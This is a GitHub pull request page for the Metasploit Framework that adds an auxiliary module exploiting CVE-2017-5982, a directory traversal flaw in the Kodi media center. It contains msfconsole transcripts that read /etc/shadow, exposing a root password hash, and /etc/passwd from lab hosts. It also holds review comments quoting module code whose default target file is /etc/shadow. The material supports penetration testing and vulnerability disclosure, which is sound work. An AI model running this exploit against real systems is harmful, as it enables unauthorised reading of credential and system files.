Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a sploit for CVE-2017-5982 #7980

Merged
merged 2 commits into from Feb 22, 2017

Conversation

Projects
None yet
5 participants
@jvoisin
Copy link
Contributor

jvoisin commented Feb 19, 2017

This PR implements a module for CVE-2017-5982 for the kodi mediacenter, loosely based on auxiliary/scanner/http/clansphere_traversal.

Verification

List the steps needed to make sure this thing works

  • Get a working kodi setup. I used libreelec since I'm lazy it just works™
  • Start msfconsole
  • use use auxiliary/scanner/http/kodi_traversal
  • Set RPORT and RHOST
  • run
  • Verify that you get the file you requested

Complete run

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info 

       Name: Kodi 17.1 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/shadow      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.0.31     yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi 17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > show options 

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/shadow      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219213028_default_192.168.0.31_kodi_812537.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf >  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin
[*] exec:  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin

systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf > 
@void-in

This comment has been minimized.

Copy link
Contributor

void-in commented Feb 20, 2017

Is the application running with root privileges? /etc/shadow can only be read by root. /etc/passwd would be a better choice for non root users.

@jvoisin

This comment has been minimized.

Copy link
Contributor Author

jvoisin commented Feb 20, 2017

It depends of the deployment, but a lot of people are running it on a super-light linux (like libreelec, openelec, …), with everything running as root.

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

This says <= 17.1

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

This says <17.1. is 17.1 vuln?

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

generally i like to link to a zip or tgz here if possible


**Vulnerable Application Installation Steps**

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

i get that libreelec is a kodi image essentially, but itd be nice to just have a quick thing here. Right now it looks like we're exploiting kodi but then libreelec comes out of left field.

I'd also like to say a libreelec build here that is known vuln for future proofing. in 5yrs this line wont change and someone will try a non-vuln version.

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

version of libreelec or kodi


## Verification Steps

A successful check of the exploit will look like this:

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

change check to run since check is a command, we dont want confusion

system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf auxiliary(kodi_traversal) > info

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

get rid of this line and the next empty one

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']),

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

per @void-in if this is typically run as root this line is fine. If not, maybe it should be /etc/passwd, or the file (db) with the logins for kodi

print_good("#{fname} stored as '#{p}'")

else
print_error("Fail to obtain file for some unknown reason")

This comment has been minimized.

Copy link
@h00die

h00die Feb 20, 2017

Contributor

change " to ' here

jvoisin

@bwatters-r7 bwatters-r7 self-assigned this Feb 22, 2017

@bwatters-r7 bwatters-r7 merged commit 73eed10 into rapid7:master Feb 22, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request Feb 22, 2017

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 22, 2017

Testing

Using http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz on rpi v2

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info

       Name: Kodi 17.0 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/passwd      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi before 
  17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > set rport 8080
rport => 8080
msf auxiliary(kodi_traversal) > set rhosts <Rpi_IP>
rhosts => <Rpi_IP>
msf auxiliary(kodi_traversal) > show options

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      10               yes       The max traversal depth to root directory
   FILE       /etc/passwd      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <Rpi_IP>  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/passwd'
[+] /etc/passwd stored as '/home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin
[*] exec: cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin

systemd-network:x:193:193:systemd-network:/:/bin/sh
root:x:0:0:Root User:/storage:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
dbus:x:81:81:System message bus:/:/bin/sh
system:x:430:430:service:/var/run/connman:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/bin/sh
avahi:x:495:495:avahi-daemon:/var/run/avahi-daemon:/bin/sh
msf auxiliary(kodi_traversal) > 

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 22, 2017

Release Notes

The Kodi 17.0 Local File Inclusion Vulnerability module has been added to the framework. It takes advantage of a directory traversal vulnerability in the popular Kodi streaming OS/Application suite to allow arbitrary file downloads from an unpatched system.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.